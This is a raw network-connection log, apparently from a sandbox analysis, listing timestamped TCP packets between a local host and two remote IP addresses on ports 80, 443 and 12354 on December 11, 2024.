                                              Dec 11, 2024 16:27:30.021861076 CET58943443192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:27:30.025486946 CET58943443192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:27:30.025583029 CET44358943202.108.0.52192.168.2.4
                                              Dec 11, 2024 16:27:30.025681019 CET58943443192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:27:30.137648106 CET5791980192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:27:30.137916088 CET5969180192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:27:30.257461071 CET8059691202.108.0.52192.168.2.4
                                              Dec 11, 2024 16:27:30.257487059 CET8057919202.108.0.52192.168.2.4
                                              Dec 11, 2024 16:27:30.257538080 CET5969180192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:27:30.257574081 CET5791980192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:27:30.263550997 CET5969180192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:27:30.386248112 CET8059691202.108.0.52192.168.2.4
                                              Dec 11, 2024 16:27:30.644850016 CET5908212354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:27:30.644850016 CET5908012354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:27:30.644905090 CET5969180192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:27:30.645966053 CET6007912354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:27:30.765919924 CET6022580192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:27:30.766814947 CET6022712354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:27:30.766930103 CET1235460079107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:27:30.767079115 CET6007912354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:27:30.767363071 CET6007912354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:27:30.885505915 CET8060225202.108.0.52192.168.2.4
                                              Dec 11, 2024 16:27:30.885586977 CET6022580192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:27:30.886140108 CET1235460227107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:27:30.886204004 CET6022712354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:27:30.886857986 CET6022580192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:27:30.887018919 CET1235460079107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:27:30.887260914 CET6022712354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:27:31.008361101 CET8060225202.108.0.52192.168.2.4
                                              Dec 11, 2024 16:27:31.008377075 CET1235460227107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:27:32.472419024 CET8060225202.108.0.52192.168.2.4
                                              Dec 11, 2024 16:27:32.472498894 CET6022580192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:27:32.483196974 CET60788443192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:27:32.483247995 CET44360788202.108.0.52192.168.2.4
                                              Dec 11, 2024 16:27:32.483325005 CET60788443192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:27:32.483858109 CET60788443192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:27:32.483871937 CET44360788202.108.0.52192.168.2.4
                                              Dec 11, 2024 16:27:32.880194902 CET1235460079107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:27:32.880264997 CET6007912354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:27:32.880980015 CET6007912354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:27:32.881455898 CET6124012354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:27:33.001537085 CET1235460079107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:27:33.002099991 CET1235461240107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:27:33.002161026 CET6124012354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:27:33.003000975 CET1235460227107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:27:33.003061056 CET6022712354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:27:33.007056952 CET6124012354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:27:33.007114887 CET6022712354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:27:33.007492065 CET6133212354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:27:33.126657963 CET1235461240107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:27:33.126677990 CET1235460227107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:27:33.127055883 CET1235461332107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:27:33.127125025 CET6133212354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:27:33.127609015 CET6133212354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:27:33.246856928 CET1235461332107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:27:34.171530008 CET44360788202.108.0.52192.168.2.4
                                              Dec 11, 2024 16:27:34.171624899 CET60788443192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:27:34.172317028 CET44360788202.108.0.52192.168.2.4
                                              Dec 11, 2024 16:27:34.172513008 CET60788443192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:27:34.175736904 CET60788443192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:27:34.175786972 CET44360788202.108.0.52192.168.2.4
                                              Dec 11, 2024 16:27:34.175920963 CET44360788202.108.0.52192.168.2.4
                                              Dec 11, 2024 16:27:34.175971031 CET60788443192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:27:34.175990105 CET60788443192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:27:34.295008898 CET6022580192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:27:34.298785925 CET6257180192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:27:34.414936066 CET8060225202.108.0.52192.168.2.4
                                              Dec 11, 2024 16:27:34.415246010 CET6022580192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:27:34.418116093 CET8062571202.108.0.52192.168.2.4
                                              Dec 11, 2024 16:27:34.418459892 CET6257180192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:27:34.458663940 CET6257180192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:27:34.578011990 CET8062571202.108.0.52192.168.2.4
                                              Dec 11, 2024 16:27:34.878143072 CET6124012354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:27:34.882294893 CET6257180192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:27:34.882344007 CET6133212354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:27:34.990134954 CET6261012354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:27:35.109494925 CET1235462610107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:27:35.112421989 CET6261012354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:27:35.234143019 CET6261012354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:27:35.291704893 CET6261280192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:27:35.292412043 CET6261312354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:27:35.353882074 CET1235462610107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:27:35.411125898 CET8062612202.108.0.52192.168.2.4
                                              Dec 11, 2024 16:27:35.411334991 CET6261280192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:27:35.411649942 CET6261280192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:27:35.411967039 CET1235462613107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:27:35.412040949 CET6261312354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:27:35.412684917 CET6261312354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:27:35.531153917 CET8062612202.108.0.52192.168.2.4
                                              Dec 11, 2024 16:27:35.532165051 CET1235462613107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:27:36.995332956 CET8062612202.108.0.52192.168.2.4
                                              Dec 11, 2024 16:27:36.995508909 CET6261280192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:27:36.998613119 CET64219443192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:27:36.998648882 CET44364219202.108.0.52192.168.2.4
                                              Dec 11, 2024 16:27:36.998919010 CET64219443192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:27:36.999759912 CET64219443192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:27:36.999773026 CET44364219202.108.0.52192.168.2.4
                                              Dec 11, 2024 16:27:37.224697113 CET1235462610107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:27:37.224816084 CET6261012354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:27:37.225493908 CET6261012354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:27:37.226006985 CET6446212354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:27:37.506880999 CET1235462610107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:27:37.506997108 CET1235464462107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:27:37.507074118 CET6446212354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:27:37.507642031 CET6446212354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:27:37.537146091 CET1235462613107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:27:37.537220955 CET6261312354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:27:37.537533045 CET6261312354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:27:37.537842035 CET6462712354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:27:37.723474979 CET1235464462107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:27:37.724400043 CET1235462613107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:27:37.724406004 CET1235464627107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:27:37.724514008 CET6462712354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:27:37.724898100 CET6462712354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:27:37.849337101 CET1235464627107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:27:38.696712971 CET44364219202.108.0.52192.168.2.4
                                              Dec 11, 2024 16:27:38.696845055 CET64219443192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:27:38.697494030 CET44364219202.108.0.52192.168.2.4
                                              Dec 11, 2024 16:27:38.699332952 CET64219443192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:27:38.704448938 CET64219443192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:27:38.704479933 CET44364219202.108.0.52192.168.2.4
                                              Dec 11, 2024 16:27:38.704602003 CET44364219202.108.0.52192.168.2.4
                                              Dec 11, 2024 16:27:38.704736948 CET64219443192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:27:38.705995083 CET64219443192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:27:38.810995102 CET6261280192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:27:38.811386108 CET6548680192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:27:38.933717012 CET8065486202.108.0.52192.168.2.4
                                              Dec 11, 2024 16:27:38.933784008 CET6548680192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:27:38.934273005 CET6548680192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:27:38.936779976 CET8062612202.108.0.52192.168.2.4
                                              Dec 11, 2024 16:27:38.937109947 CET6261280192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:27:39.054023027 CET8065486202.108.0.52192.168.2.4
                                              Dec 11, 2024 16:27:39.245786905 CET6548680192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:27:39.245796919 CET6462712354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:27:39.245831013 CET6446212354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:27:39.246975899 CET4950612354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:27:39.369024992 CET1235449506107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:27:39.369107962 CET4950612354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:27:39.395287991 CET4959280192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:27:39.395651102 CET4959312354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:27:39.395875931 CET4950612354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:27:39.514945030 CET8049592202.108.0.52192.168.2.4
                                              Dec 11, 2024 16:27:39.515032053 CET4959280192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:27:39.515033960 CET1235449593107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:27:39.515080929 CET4959312354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:27:39.515120029 CET1235449506107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:27:39.550822973 CET4959280192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:27:39.550941944 CET4959312354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:27:39.670101881 CET8049592202.108.0.52192.168.2.4
                                              Dec 11, 2024 16:27:39.670171976 CET1235449593107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:27:41.094141960 CET8049592202.108.0.52192.168.2.4
                                              Dec 11, 2024 16:27:41.094225883 CET4959280192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:27:41.097287893 CET50153443192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:27:41.097340107 CET44350153202.108.0.52192.168.2.4
                                              Dec 11, 2024 16:27:41.097501993 CET50153443192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:27:41.098313093 CET50153443192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:27:41.098324060 CET44350153202.108.0.52192.168.2.4
                                              Dec 11, 2024 16:27:41.488337994 CET1235449506107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:27:41.488676071 CET4950612354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:27:41.489350080 CET4950612354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:27:41.489907026 CET5061112354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:27:41.609509945 CET1235449506107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:27:41.609524965 CET1235450611107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:27:41.609606981 CET5061112354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:27:41.609787941 CET5061112354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:27:41.628189087 CET1235449593107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:27:41.628345966 CET4959312354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:27:41.628345966 CET4959312354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:27:41.628844976 CET5076712354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:27:41.730434895 CET1235450611107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:27:41.748553038 CET1235449593107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:27:41.748569012 CET1235450767107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:27:41.748651028 CET5076712354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:27:41.749639988 CET5076712354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:27:41.869050980 CET1235450767107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:27:42.796442986 CET44350153202.108.0.52192.168.2.4
                                              Dec 11, 2024 16:27:42.799900055 CET50153443192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:27:42.799913883 CET44350153202.108.0.52192.168.2.4
                                              Dec 11, 2024 16:27:42.800295115 CET50153443192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:28:05.270745039 CET50458443192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:28:05.271174908 CET50458443192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:28:05.271188021 CET44350458202.108.0.52192.168.2.4
                                              Dec 11, 2024 16:28:05.858772993 CET1235465394107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:28:05.860337973 CET6539412354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:28:05.925735950 CET1235465425107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:28:05.928322077 CET6542512354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:28:06.003770113 CET6539412354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:28:06.004983902 CET5078412354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:28:06.123136044 CET1235465394107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:28:06.124205112 CET1235450784107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:28:06.124325037 CET5078412354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:28:06.271002054 CET6542512354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:28:06.272665024 CET5078412354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:28:06.306508064 CET5078612354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:28:06.390670061 CET1235465425107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:28:06.392424107 CET1235450784107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:28:06.428483009 CET1235450786107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:28:06.432327986 CET5078612354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:28:06.580540895 CET5078612354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:28:06.777991056 CET1235450786107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:28:06.960267067 CET44350458202.108.0.52192.168.2.4
                                              Dec 11, 2024 16:28:06.960376024 CET50458443192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:28:06.961014986 CET44350458202.108.0.52192.168.2.4
                                              Dec 11, 2024 16:28:06.961114883 CET50458443192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:28:06.964282036 CET50458443192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:28:06.964665890 CET44350458202.108.0.52192.168.2.4
                                              Dec 11, 2024 16:28:06.964735985 CET50458443192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:28:07.076102018 CET6539680192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:28:07.076360941 CET5115180192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:28:07.199409008 CET8051151202.108.0.52192.168.2.4
                                              Dec 11, 2024 16:28:07.199424982 CET8065396202.108.0.52192.168.2.4
                                              Dec 11, 2024 16:28:07.199518919 CET6539680192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:28:07.199527025 CET5115180192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:28:07.203725100 CET5115180192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:28:07.323296070 CET8051151202.108.0.52192.168.2.4
                                              Dec 11, 2024 16:28:07.572292089 CET5078412354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:28:07.572325945 CET5078612354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:28:07.572331905 CET5115180192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:28:07.572828054 CET5153712354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:28:07.687474966 CET5167380192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:28:07.688611031 CET5167512354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:28:07.693459988 CET1235451537107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:28:07.693555117 CET5153712354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:28:07.693909883 CET5153712354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:28:07.807126045 CET8051673202.108.0.52192.168.2.4
                                              Dec 11, 2024 16:28:07.807279110 CET5167380192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:28:07.808047056 CET5167380192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:28:07.808285952 CET1235451675107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:28:07.808485985 CET5167512354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:28:07.809799910 CET5167512354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:28:07.814207077 CET1235451537107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:28:07.928402901 CET8051673202.108.0.52192.168.2.4
                                              Dec 11, 2024 16:28:07.929409981 CET1235451675107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:28:09.379700899 CET8051673202.108.0.52192.168.2.4
                                              Dec 11, 2024 16:28:09.380338907 CET5167380192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:28:09.569103003 CET52420443192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:28:09.569144964 CET44352420202.108.0.52192.168.2.4
                                              Dec 11, 2024 16:28:09.569216967 CET52420443192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:28:09.570442915 CET52420443192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:28:09.570458889 CET44352420202.108.0.52192.168.2.4
                                              Dec 11, 2024 16:28:09.815726042 CET1235451537107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:28:09.815792084 CET5153712354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:28:09.815885067 CET5153712354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:28:09.816447020 CET5255812354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:28:09.923489094 CET1235451675107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:28:09.923820972 CET5167512354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:28:09.935050964 CET1235451537107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:28:09.935740948 CET1235452558107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:28:09.935935974 CET5255812354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:28:09.940814018 CET5167512354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:28:09.941750050 CET5255812354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:28:09.944701910 CET5269312354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:28:10.060410023 CET1235451675107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:28:10.061414957 CET1235452558107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:28:10.064156055 CET1235452693107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:28:10.064224005 CET5269312354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:28:10.064570904 CET5269312354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:28:10.185642958 CET1235452693107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:28:11.281533003 CET44352420202.108.0.52192.168.2.4
                                              Dec 11, 2024 16:28:11.281620979 CET52420443192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:28:11.282500982 CET44352420202.108.0.52192.168.2.4
                                              Dec 11, 2024 16:28:11.282581091 CET52420443192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:28:11.303371906 CET52420443192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:28:11.303474903 CET44352420202.108.0.52192.168.2.4
                                              Dec 11, 2024 16:28:11.303554058 CET52420443192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:28:11.424921989 CET5167380192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:28:11.425407887 CET5380180192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:28:11.545224905 CET8053801202.108.0.52192.168.2.4
                                              Dec 11, 2024 16:28:11.545315981 CET5380180192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:28:11.545839071 CET8051673202.108.0.52192.168.2.4
                                              Dec 11, 2024 16:28:11.545958042 CET5167380192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:28:11.546214104 CET5380180192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:28:11.601738930 CET5269312354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:28:11.601780891 CET5255812354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:28:11.601787090 CET5380180192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:28:11.613280058 CET5385212354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:28:11.669091940 CET8053801202.108.0.52192.168.2.4
                                              Dec 11, 2024 16:28:11.669157028 CET5380180192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:28:11.733010054 CET1235453852107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:28:11.733103991 CET5385212354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:28:11.761591911 CET5385212354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:28:11.811222076 CET5385812354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:28:11.811866999 CET5385980192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:28:11.885688066 CET1235453852107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:28:11.931361914 CET1235453858107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:28:11.931432962 CET5385812354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:28:11.932034969 CET8053859202.108.0.52192.168.2.4
                                              Dec 11, 2024 16:28:11.932097912 CET5385980192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:28:11.951822996 CET5385812354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:28:11.951911926 CET5385980192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:28:12.071841002 CET1235453858107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:28:12.072009087 CET8053859202.108.0.52192.168.2.4
                                              Dec 11, 2024 16:28:13.505053043 CET8053859202.108.0.52192.168.2.4
                                              Dec 11, 2024 16:28:13.505125999 CET5385980192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:28:13.510031939 CET55203443192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:28:13.510057926 CET44355203202.108.0.52192.168.2.4
                                              Dec 11, 2024 16:28:13.510234118 CET55203443192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:28:13.514756918 CET55203443192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:28:13.514767885 CET44355203202.108.0.52192.168.2.4
                                              Dec 11, 2024 16:28:13.848012924 CET1235453852107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:28:13.849785089 CET5385212354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:28:13.850191116 CET5385212354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:28:13.850193024 CET5559212354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:28:13.970993996 CET1235453852107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:28:13.971007109 CET1235455592107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:28:13.971215963 CET5559212354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:28:13.974351883 CET5559212354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:28:14.065956116 CET1235453858107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:28:14.066138029 CET5385812354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:28:14.066514015 CET5385812354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:28:14.067058086 CET5578012354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:28:14.093791008 CET1235455592107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:28:14.185815096 CET1235453858107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:28:14.186866999 CET1235455780107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:28:14.187055111 CET5578012354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:28:14.187589884 CET5578012354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:28:14.310024977 CET1235455780107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:28:15.240447998 CET44355203202.108.0.52192.168.2.4
                                              Dec 11, 2024 16:28:15.240515947 CET55203443192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:28:15.241198063 CET44355203202.108.0.52192.168.2.4
                                              Dec 11, 2024 16:28:15.241302013 CET55203443192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:28:15.245805025 CET55203443192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:28:15.245852947 CET44355203202.108.0.52192.168.2.4
                                              Dec 11, 2024 16:28:15.245908976 CET55203443192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:28:15.431991100 CET5385980192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:28:15.432389021 CET5674880192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:28:15.554116011 CET8056748202.108.0.52192.168.2.4
                                              Dec 11, 2024 16:28:15.554209948 CET8053859202.108.0.52192.168.2.4
                                              Dec 11, 2024 16:28:15.554215908 CET5674880192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:28:15.554255962 CET5385980192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:28:15.554488897 CET5674880192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:28:15.675597906 CET8056748202.108.0.52192.168.2.4
                                              Dec 11, 2024 16:28:15.775511980 CET5559212354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:28:15.775592089 CET5674880192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:28:15.775674105 CET5578012354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:28:15.776140928 CET5702412354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:28:15.889343977 CET5717212354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:28:15.892606974 CET5717480192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:28:15.896300077 CET1235457024107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:28:15.896363974 CET5702412354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:28:15.896816969 CET5702412354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:28:16.008753061 CET1235457172107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:28:16.008832932 CET5717212354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:28:16.009551048 CET5717212354192.168.2.4107.163.241.232
